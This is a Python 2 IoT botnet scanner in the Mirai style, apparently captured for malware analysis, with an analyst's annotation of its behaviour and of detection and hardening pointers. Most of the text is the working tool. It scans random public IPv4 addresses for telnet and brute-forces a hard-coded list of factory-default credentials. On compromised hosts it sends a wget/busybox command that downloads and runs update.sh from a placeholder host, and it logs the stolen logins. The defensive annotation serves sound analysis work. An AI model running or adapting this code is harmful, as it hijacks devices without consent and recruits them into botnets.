# NOTE(review): analyst annotation. The listing below is kept exactly as
# captured. It is a Python 2 script (print statement, xrange, raw_input) whose
# line breaks were lost, so the first physical line parses as one '#' comment.
#
# Behaviour visible in the code:
#   - argv[1] is the number of worker threads; argv[2] is an output file that
#     is opened in append mode.
#   - worker() loops forever: gen_IP() builds a random IPv4 address (first
#     octets 10, 127, 169, 172 and 192 are skipped entirely), then a TCP
#     connect to port 23 is attempted with a 0.37 s timeout. Every address
#     that accepts the connection gets its own `router` thread.
#   - router.run() walks the hard-coded `combo` list of user:password pairs
#     against the telnet service, answering two ':'-terminated prompts with
#     the username and then the password.
#   - After the prompt exchange it sends self.rekdevice, a shell one-liner
#     that changes to /tmp, fetches update.sh with wget and busybox wget,
#     chmods it 777, runs it and deletes it. The download host in this copy
#     is the placeholder 0.0.0.0.
#   - When an attempt is treated as successful, "<ip>:23 <user>:<password>" is
#     appended to the output file; the inline comment on that write tags the
#     format "mirai".
#   - Pressing Enter on the console ends the process via os.kill(..., 9).
#
# Detection and mitigation pointers for defenders:
#   - Network: one source opening many very short-lived TCP/23 connections to
#     unrelated public addresses, followed by repeated telnet logins against
#     responding hosts that cycle through factory-default pairs.
#   - Credentials: the pairs in `combo` are vendor defaults; several of them
#     (for example root:xc3511, root:vizxv) also appear in the credential
#     table of the published Mirai source, so existing Mirai-family telnet
#     signatures are a reasonable starting point.
#   - Device side: telnet input containing the "cd /tmp; wget ...; busybox
#     wget ...; chmod 777 update.sh; sh update.sh; rm -f update.sh" sequence,
#     or a short-lived /tmp/update.sh, indicates this loader or a close
#     relative.
#   - Hardening: disable or firewall telnet on embedded devices, replace
#     factory-default credentials, and restrict outbound HTTP from device
#     networks so a fetched second stage cannot be retrieved.
#!/usr/bin/python import threading import sys, os, re, time, random, socket, select if len(sys.argv) < 3: print "Usage: python "+sys.argv[0]+" " sys.exit() combo = [ "root:root", "root:", "admin:admin", "support:support", "user:user", "admin:", "admin:password", "root:vizxv", "root:admin", "root:xc3511", "root:888888", "root:xmhdipc", "root:default", "root:juantech", "root:123456", "root:54321", "root:12345", "root:pass", "ubnt:ubnt", "root:klv1234", "root:Zte521", "root:hi3518", "root:jvbzd", "root:anko", "root:zlxx.", "root:7ujMko0vizxv", "root:7ujMko0admin", "root:system", "root:ikwb", "root:dreambox", "root:user", "root:realtek", "root:00000000", "admin:1111111", "admin:1234", "admin:12345", "admin:54321", "admin:123456", "admin:7ujMko0admin", "admin:1234", "admin:pass", "admin:meinsm", "admin:admin1234", "root:1111", "admin:smcadmin", "admin:1111", "root:666666", "root:password", "root:1234", "root:klv123", "Administrator:admin", "service:service", "supervisor:supervisor", "guest:guest", "guest:12345", "guest:12345", "admin1:password", "administrator:1234", "666666:666666", "888888:888888", "tech:tech", "mother:fucker" ] threads = int(sys.argv[1]) output_file = sys.argv[2] def readUntil(tn, string, timeout=8): buf = '' start_time = time.time() while time.time() - start_time < timeout: buf += tn.recv(1024) time.sleep(0.1) if string in buf: return buf raise Exception('TIMEOUT!') def recvTimeout(sock, size, timeout=8): sock.setblocking(0) ready = select.select([sock], [], [], timeout) if ready[0]: data = sock.recv(size) return data return "" class router(threading.Thread): def __init__ (self, ip): threading.Thread.__init__(self) self.ip = str(ip).rstrip('\n') self.rekdevice="cd /tmp; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send def run(self): global fh username = "" password = "" for passwd in combo: if ":n/a" in passwd: password="" else: password=passwd.split(":")[1] if 
"n/a:" in passwd: username="" else: username=passwd.split(":")[0] try: tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) tn.settimeout(0.37) tn.connect((self.ip,23)) except Exception: tn.close() break try: hoho = '' hoho += readUntil(tn, ":") if ":" in hoho: tn.send(username + "\r\n") time.sleep(0.1) hoho = '' hoho += readUntil(tn, ":") if ":" in hoho: tn.send(password + "\r\n") time.sleep(0.1) prompt = '' prompt += recvTimeout(tn, 40960) if "#" in prompt or "$": success = True else: tn.close() if success == True: try: tn.send(self.rekdevice + "\r\n") fh.write(self.ip + ":23 " + username + ":" + password + "\n") # 1.1.1.1:23 user:pass //mirai fh.flush() print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip) time.sleep(10) tn.close() break except: tn.close() else: tn.close() except Exception: tn.close() def gen_IP(): not_valid = [10,127,169,172,192] first = random.randrange(1,256) while first in not_valid: first = random.randrange(1,256) ip = ".".join([str(first),str(random.randrange(1,256)), str(random.randrange(1,256)),str(random.randrange(1,256))]) return ip def worker(): while True: try: IP = gen_IP() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(0.37) s.connect((IP, 23)) s.close() thread = router(IP) thread.start() time.sleep(0.02) except: pass global fh fh = open(output_file, "a") for l in xrange(threads): try: t = threading.Thread(target=worker) t.start() except: pass print "Started " + str(threads) + " scanner threads! Press enter to stop." raw_input() os.kill(os.getpid(), 9)